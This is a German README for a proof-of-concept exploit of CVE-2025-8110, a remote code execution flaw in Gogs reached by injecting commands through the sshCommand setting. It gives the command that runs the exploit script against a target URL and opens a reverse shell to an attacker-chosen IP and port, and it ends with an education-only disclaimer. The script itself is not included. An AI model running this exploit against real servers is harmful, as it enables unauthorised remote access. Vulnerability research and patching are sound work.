
CVE-2025-8110 PoC
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-8110, eine Remote Code Execution (RCE)-Sicherheitslücke in Gogs. Der Exploit zielt auf die interne SSH-Server-Implementierung ab und ermöglicht Angreifern, bösartige Befehle über die sshCommand-Konfiguration einzuschleusen.
Um den Exploit auszuführen, verwenden Sie das Skript CVE-2025-8110.py mit der Ziel-Gogs-URL und Ihrer Lausch-Host/Port für die Reverse Shell.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: Basis-URL der Ziel-Gogs-Instanz (z. B. http://localhost:3000).-lh, --host: IP-Adresse, zu der die Reverse Shell eine Verbindung herstellen soll.-lp, --port: Port, zu dem die Reverse Shell eine Verbindung herstellen soll.-x, --proxy: (Optional) Verwenden Sie einen lokalen Proxy unter http://localhost:8080 zum Debuggen.Dieser Proof of Concept (PoC) dient ausschließlich zu Bildungs- und Forschungszwecken. Er soll Sicherheitsforschern und Administratoren helfen, die CVE-2025-8110-Sicherheitslücke zu verstehen und zu entschärfen.
Der Autor übernimmt keine Verantwortung für unbefugte oder böswillige Nutzung dieses Codes. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Testgenehmigung haben. Durch die Nutzung dieses Codes erklären Sie sich bereit, die volle Verantwortung für Ihre Handlungen zu übernehmen.